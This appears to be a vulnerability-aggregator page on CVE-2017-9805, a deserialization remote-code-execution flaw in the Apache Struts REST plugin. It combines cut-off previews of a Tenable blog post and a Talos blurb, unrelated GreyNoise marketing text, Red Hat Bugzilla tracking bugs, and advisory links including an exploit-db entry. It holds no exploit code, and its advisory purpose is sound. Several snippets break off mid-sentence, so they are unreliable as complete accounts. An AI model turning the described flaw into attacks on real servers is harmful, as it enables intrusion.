This isn't the only vulnerability that has been recently identified in Apache Struts. Earlier this year , Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed explo
Tenable
Apache Struts REST Plugin XStream XML Request Deserialization RCE (CVE 2017-9805)
blogs_tenable·2017-09-06
CVE-2017-9805 Apache Struts REST Plugin XStream XML Request Deserialization RCE (CVE 2017-9805)
Blog /
Subscribe
# Apache Struts REST Plugin XStream XML Request Deserialization RCE (CVE 2017-9805)
Scott Caveza
September 6, 2017
3 Min Read
A new critical vulnerability (S2-052) in the Apache Struts framework (CVE 2017-9805) could allow an unauthenticated attacker to run arbitrary commands on a server using the Struts framework with the popular REST communication plugin.
### Vulnerability details
A remote code execution vulnerability exists in Apache Struts due to an unsafe deserialization of Java code in the REST plugin. The REST plugin uses XStream to deserialize XML requests without first sanitizing user-supplied input. This allows a remote unauthenticated attacker to execute arbitrary code using a crafted XML payload passed to the REST plugin.
A code sample used by lgtm to i
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2017-9793 CVE-2017-9805 struts: various flaws [epel-7]
bugzilla·2017-09-05·CVSS 7.5
CVE-2017-9793 [HIGH] CVE-2017-9793 CVE-2017-9805 struts: various flaws [epel-7]
CVE-2017-9793 CVE-2017-9805 struts: various flaws [epel-7]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-7.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Discussion:
Use the following template to for the 'fedpkg update' request
Bugzilla
CVE-2017-9793 CVE-2017-9805 struts: various flaws [fedora-all]
bugzilla·2017-09-05·CVSS 7.5
CVE-2017-9793 [HIGH] CVE-2017-9793 CVE-2017-9805 struts: various flaws [fedora-all]
CVE-2017-9793 CVE-2017-9805 struts: various flaws [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versions of Fedora. Whi
Bugzilla
CVE-2017-9805 struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
bugzilla·2017-09-05·CVSS 8.1
CVE-2017-9805 [HIGH] CVE-2017-9805 struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
CVE-2017-9805 struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads.
Affected versions:
Struts 2.5 - Struts 2.5.12
External References:
https://struts.apache.org/docs/s2-052.html
Discussion:
Created struts tracking bugs for this issue:
Affects: epel-7 [bug 1488487]
Affects: fedora-all [bug 1488488]
---
Statement:
A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. This earlier statement was incorrect. While Struts 2 is not actively compiled, shipped, used, or enabled in an
http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.htmlhttp://www.securityfocus.com/bid/100609http://www.securitytracker.com/id/1039263https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifaxhttps://bugzilla.redhat.com/show_bug.cgi?id=1488482https://cwiki.apache.org/confluence/display/WW/S2-052https://lgtm.com/blog/apache_struts_CVE-2017-9805https://security.netapp.com/advisory/ntap-20170907-0001/https://struts.apache.org/docs/s2-052.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2https://www.exploit-db.com/exploits/42627/https://www.kb.cert.org/vuls/id/112992http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.htmlhttp://www.securityfocus.com/bid/100609http://www.securitytracker.com/id/1039263https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifaxhttps://bugzilla.redhat.com/show_bug.cgi?id=1488482https://cwiki.apache.org/confluence/display/WW/S2-052https://lgtm.com/blog/apache_struts_CVE-2017-9805https://security.netapp.com/advisory/ntap-20170907-0001/https://struts.apache.org/docs/s2-052.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2https://www.exploit-db.com/exploits/42627/https://www.kb.cert.org/vuls/id/112992https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-9805
2017-09-15
Published
2021-11-03
Added to CISA KEV
Exploited in the wild